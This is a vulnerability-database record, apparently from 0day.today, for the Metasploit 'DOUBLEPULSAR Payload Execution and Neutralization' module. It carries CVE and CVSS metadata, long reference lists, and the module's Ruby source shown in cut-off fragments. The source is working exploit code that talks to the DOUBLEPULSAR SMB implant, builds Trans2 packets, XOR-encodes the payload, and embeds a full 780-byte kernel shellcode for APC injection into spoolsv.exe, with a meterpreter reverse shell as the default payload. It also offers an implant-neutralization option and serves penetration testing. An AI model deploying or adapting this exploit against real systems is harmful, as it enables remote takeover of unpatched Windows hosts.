0x#{@xor_key.to_s(16).upcase}\")\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\n\n print_status('Sending shellcode to DOUBLEPULSAR')\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\n when 'Neutralize implant'\n return neutralize_implant\n end\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n print_good('Payload execution successful')\n when :invalid_params\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\n when :alloc_failure\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\n else\n fail_with(Failure::Unknown, 'An unknown error occurred')\n end\n ensure\n disconnect\n end\n\n def neutralize_implant\n print_status('Neutralizing DOUBLEPULSAR')\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n print_good('Implant neutralization successful')\n else\n fail_with(Failure::Unknown, 'An unknown error occurred')\n end\n end\n\n def do_smb_setup_tree(ipc_share)\n connect\n\n # logon as user \\\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\n\n # connect to IPC$\n simple.connect(ipc_share)\n\n # return tree\n simple.shares[ipc_share]\n end\n\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\n # make doublepulsar knock\n pkt = make_smb_trans2_doublepulsar(opcode, body)\n\n sock.put(pkt)\n bytes = sock.get_once\n\n return unless bytes\n\n # convert packet to response struct\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\n pkt.from_s(bytes[4..-1])\n\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\n end\n\n def make_smb_trans2_doublepulsar(opcode, body)\n setup_count = 1\n setup_data = [0x000e].pack('v')\n\n param = generate_doublepulsar_param(opcode, body)\n data = param + body.to_s\n\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\n simple.client.smb_defaults(pkt['Payload']['SMB'])\n\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\n param_offset = base_offset\n data_offset = param_offset + param.length\n\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\n\n @multiplex_id = rand(0xffff)\n\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\n\n pkt['Payload'].v['ParamCountTotal'] = param.length\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\n pkt['Payload'].v['ParamCountMax'] = 1\n pkt['Payload'].v['DataCountMax'] = 0\n pkt['Payload'].v['ParamCount'] = param.length\n pkt['Payload'].v['ParamOffset'] = param_offset\n pkt['Payload'].v['DataCount'] = body.to_s.length\n pkt['Payload'].v['DataOffset'] = data_offset\n pkt['Payload'].v['SetupCount'] = setup_count\n pkt['Payload'].v['SetupData'] = setup_data\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\n pkt['Payload'].v['Payload'] = data\n\n pkt.to_s\n end\n\n # ring3 = user mode encoded payload\n # proc_name = process to inject APC into\n def make_kernel_user_payload(ring3, proc_name)\n sc = make_kernel_shellcode(proc_name)\n\n sc << [ring3.length].pack(\"S<\")\n sc << ring3\n\n sc\n end\n\n def generate_process_hash(process)\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\n proc_hash = 0\n process << \"\\x00\"\n\n process.each_byte do |c|\n proc_hash = ror(proc_hash, 13)\n proc_hash += c\n end\n\n [proc_hash].pack('l<')\n end\n\n def ror(dword, bits)\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\n end\n\n def make_kernel_shellcode(proc_name)\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\n # Length: 780 bytes\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\n generate_process_hash(proc_name.upcase) +\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\n end\n\n def kernel_shellcode_size\n make_kernel_shellcode('').length\n end\n\nend\n"}, "lastseen": "2021-11-11T00:00:44", "differentElements": ["sourceData"], "edition": 69}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "8bc0c205d41faf4fcc6b0513937f8e66", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-11-18T07:55:05", "history": [], "viewCount": 94, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-29702"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987", "EDB-ID:43970"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0144"]}, {"type": "symantec", "idList": ["SMNTC-96709", "SMNTC-96706", "SMNTC-96703", "SMNTC-96705", "SMNTC-96707", "SMNTC-96704"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0205", "CPAI-2017-0177", "CPAI-2017-0203", "CPAI-2017-0198", "CPAI-2017-0419", "CPAI-2017-0200"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0143", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-11-18T07:55:05", "rev": 2}, "score": {"value": 6.5, "vector": "NONE", "modified": "2021-11-18T07:55:05", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": ""}, "lastseen": "2021-11-18T07:55:05", "differentElements": ["sourceData"], "edition": 70}], "viewCount": 94, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "nessus", "idList": ["700099.PRM", "700059.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-27752"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:154690"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96707", "SMNTC-96705", "SMNTC-96703", "SMNTC-96706", "SMNTC-96709", "SMNTC-96704"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0200", "CPAI-2017-0203", "CPAI-2017-0205", "CPAI-2017-0177", "CPAI-2017-0198", "CPAI-2017-0419"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-11-18T10:01:02", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-11-18T10:01:02", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::SMB::Client\n\n MAX_SHELLCODE_SIZE = 4096\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\n 'Description' => %q{\n This module executes a Metasploit payload against the Equation Group's\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\n\n While this module primarily performs code execution against the implant,\n the \"Neutralize implant\" target allows you to disable the implant.\n },\n 'Author' => [\n 'Equation Group', # DOUBLEPULSAR implant\n 'Shadow Brokers', # Equation Group dump\n 'zerosum0x0', # DOPU analysis and detection\n 'Luke Jennings', # DOPU analysis and detection\n 'wvu', # Metasploit module and arch detection\n 'Jacob Robles' # Metasploit module and RCE help\n ],\n 'References' => [\n ['MSB', 'MS17-010'],\n ['CVE', '2017-0143'],\n ['CVE', '2017-0144'],\n ['CVE', '2017-0145'],\n ['CVE', '2017-0146'],\n ['CVE', '2017-0147'],\n ['CVE', '2017-0148'],\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\n ],\n 'DisclosureDate' => '2017-04-14',\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X64,\n 'Privileged' => true,\n 'Payload' => {\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\n 'DisableNops' => true\n },\n 'Targets' => [\n ['Execute payload', {}],\n ['Neutralize implant', {}]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread',\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\n },\n 'Notes' => {\n 'AKA' => ['DOUBLEPULSAR'],\n 'RelatedModules' => [\n 'auxiliary/scanner/smb/smb_ms17_010',\n 'exploit/windows/smb/ms17_010_eternalblue'\n ],\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION]\n }\n ))\n\n register_advanced_options([\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\n ])\n end\n\n OPCODES = {\n ping: 0x23,\n exec: 0xc8,\n kill: 0x77\n }\n\n STATUS_CODES = {\n not_detected: 0x00,\n success: 0x10,\n invalid_params: 0x20,\n alloc_failure: 0x30\n }\n\n def calculate_doublepulsar_status(m1, m2)\n STATUS_CODES.key(m2.to_i - m1.to_i)\n end\n\n # algorithm to calculate the XOR Key for DoublePulsar knocks\n def calculate_doublepulsar_xor_key(s)\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\n x & 0xffffffff # this line was added just to truncate to 32 bits\n end\n\n # The arch is adjacent to the XOR key in the SMB signature\n def calculate_doublepulsar_arch(s)\n s == 0 ? ARCH_X86 : ARCH_X64\n end\n\n def generate_doublepulsar_timeout(op)\n k = SecureRandom.random_bytes(4).unpack('V').first\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\n end\n\n def generate_doublepulsar_param(op, body)\n case OPCODES.key(op)\n when :ping, :kill\n \"\\x00\" * 12\n when :exec\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\n end\n end\n\n def check\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\n\n @tree_id = do_smb_setup_tree(ipc_share)\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\n vprint_status(\"Target OS is #{smb_peer_os}\")\n\n vprint_status('Sending ping to DOUBLEPULSAR')\n code, signature1, signature2 = do_smb_doublepulsar_pkt\n msg = 'Host is likely INFECTED with DoublePulsar!'\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n @xor_key = calculate_doublepulsar_xor_key(signature1)\n @arch = calculate_doublepulsar_arch(signature2)\n\n arch_str =\n case @arch\n when ARCH_X86\n 'x86 (32-bit)'\n when ARCH_X64\n 'x64 (64-bit)'\n end\n\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\n CheckCode::Vulnerable\n when :not_detected\n vprint_error('DOUBLEPULSAR not detected or disabled')\n CheckCode::Safe\n else\n vprint_error('An unknown error occurred')\n CheckCode::Unknown\n end\n end\n\n def exploit\n if datastore['DefangedMode']\n warning = 